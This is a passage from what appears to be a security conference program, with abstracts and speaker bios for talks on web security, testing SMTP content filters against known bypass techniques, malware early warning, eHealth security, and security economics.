and Deploy # Web security controls and best practices # Secure coding and reverse engineering methods # Tools and Techniques # Hands-on challenges and labs
Shreeraj Shah, B.E., MSCS, MBA, is the founder of Blueinfy, a company that provides application security services. Prior to founding Blueinfy, he was founder and board member at Net Square. He also worked with Foundstone (McAfee), Chase Manhattan Bank and IBM in security space. He has performed several security consulting assignments in the area of penetration testing, code reviews, web application assessments and security architecture reviews. He is also the author of popular books like Hacking Web Services (Thomson 06) and Web Hacking: Attacks and Defense (Addison-Wesley 03). In addition, he has published several advisories, tools, and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan, ISACA etc. His articles are regularly published on Securityfocus, InformIT, DevX, O’reilly, HNS. His work has been quoted on BBC, Dark Reading, Bank Technology as an expert.

Are the vendors listening?

Simon Howard, DMZGlobal - www.dmzglobal.com
Are vendors listening to the security community? Security researchers have been presenting techniques to bypass commonly implemented technologies for years. White papers are published, ideas are presented and vulnerabilities disclosed. If your organisation is purchasing a new NAC solution from Vendor X, you want to know they have read “Bypassing Network Access Control (NAC) Systems” by Ofir Arkin and that their product has mitigation strategies in place for each attack vector. Even a paper published back in '98 like “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection by Thomas Ptacek & Timothy Newsham” still provides bypass techniques applicable in today's environment. Testing security products before you buy them is part of the due diligence process. Finding vulnerabilities gains you leverage with the sales rep, while he patches the bugs you get a better product for less cash. During this talk I will take 3APA3A's white paper on “Bypassing content filtering software”, construct a series of tests and run them against the following SMTP filtering products: Trend Micro IMSS Mail Marshall SMTP Ironport Sophos PureMessage Proofpoint Messaging Security Gateway Symantec Mail Security for SMTP At the conclusion of the presentation you can make your own mind up on whether the vendors are listening....
Simon Howard started programming BASIC on a ZX81 with a 16k RAM pack. Simon is currently employed by DMZGlobal, a MSSP in New Zealand tasked with building and managing secure environments for a variety of customers in the .govt, banking and energy sectors. Prior to working for DMZGlobal, Simon was a Linux-centric software engineer for a media company in Dunedin.

Observing the Tidal Waves of Malware

Stefano Zanero, Partner and CTO, Secure Network
In this talk we will address the main challenges to be solved in order to build an automatic, global network which can perform early warning, automatic classification and analysis of malware and exploits as they propagate, or are used, worldwide. We all know of honeypots, early warning systems, and the Internet Storm Center: what are the missing pieces before we can really observe the tidal waves of malware and exploit the knowledge gained?
Stefano Zanero received a Ph.D. degree in Computer Engineering from the Politecnico of Milano technical university, where he is currently spending his post-doc. His current research interests include the development of unsupervised learning IDS and computer virology. He has been a speaker at international scientific and technical conferences, and he is the author and co-author of books and articles published in international, peer reviewed journals and conferences. He is a member of the board of the "Journal in Computer Virology", and acts as a reviewer for the "ACM Computing Reviews" and "IEEE Security&Privacy", as well as various primary international conferences. He is a member of the IEEE (Institute of Electrical and Electronics Engineers), for which he vice-chairs the Italian chapter of the Computer Society, of the ACM (Association for Computing Machinery), and a founding member and board member of the Italian Chapter of ISSA (Information Systems Security Association). He has also been a columnist for Computer World Italy, and has been awarded a journalism award in 2003. Since 2004 he is a partner and CTO of Secure Network, a firm specializing in information security training and consulting, based in Milan.

Security -- an Obstacle for large-scale Projects and eGovernment?

Thomas Maus,
This talk tries to take up again a thread, which was completely lost in the tumultuous public reception of a 21C3 talk: Security is a fundamental quality dimension of information systems, a conditio sine qua non for long-term acceptance both of any large-scale project and information technology in general, an imperative prerequisite for critical infrastructures as well as any legislative obligation of free citizens to use eGovernment. As eHealth projects concentrate and amplify all conceivable challenges of large-scale IT projects they will serve as an excellent magnifying glass. Alas, experience shows, they are a dangerous target of investigation: Some believe them to be the panacea of modern health care. They are object of fervent dispute, and seem to serve many (hidden?) agendas, at least as an opportunity to place some hype-tech, and make much money. Starting with some (time-proven) worrying findings from German eHealth projects, we will follow their reception by the public, stakeholders, and government, as well as the further development. Widening our scope by and by, we try do find some generic patterns, and what we might learn from theses messes: * on a personal level as managers, technicians or security experts * for large-scale projects in companies and governments * as society, structuring and controlling our dependency on information systems
Thomas Maus holds a graduate in computer science. He is consulting in the areas of system security, the analysis, tuning, and prognosis of system performance, as well as the management of large, heterogenous, mission-critical installations since 1993. Projects range from architecture, implementation and operation of large application clusters over technical project management, organisational and technical trouble-shooting, security assessments, establishing of security governance processes, security policies and analysis for trading rooms and the like, to training of international police special forces for combatting cyber-crime. He started his computing career 1979, at the age of sixteen, when winning the computing equipment for his school in a state-wide competition. Soon followed the teamworked development of a comprehensive SW for school administration on behalf of the federal state -- here a long lasting affection for questions of system security, performance and architecture started. Around 1984 he fell in love with UNIX systems and IP stacks and embraced the idea of Free Software.

Economics of Information Security

Tyler Moore, University of Cambridge
The economics of information security has recently become a thriving and fastmoving discipline. As distributed systems are assembled from machines belonging to principals with divergent interests, we find that incentives are becoming as important as technical design in achieving dependability. The new field provides valuable insights not just into ‘security’ topics (such as bugs, spam, phishing, and law enforcement strategy) but into more general areas such as the design of peer-to-peer systems, the optimal balance of effort by programmers and testers, why privacy gets eroded, and the politics of digital rights management.
Joined the Cambridge Computer Laboratory's Security Group in 2004 as a PhD student investigating social and economic mechanisms as tools for strengthening network security. Research interests include security economics, decentralised network (e.g., peer-to-peer and sensor network) security, and complex network analysis. Prior to joining Cambridge, he studied at the University of Tulsa, identifying several vulnerabilities in the public telephone network's underlying signalling protocols and developing techniques for detecting attacks on the telecommunications infrastructure. Moore is a 2004 Marshall Scholar and 2004 US National Science Foundation Graduate Research Fellow.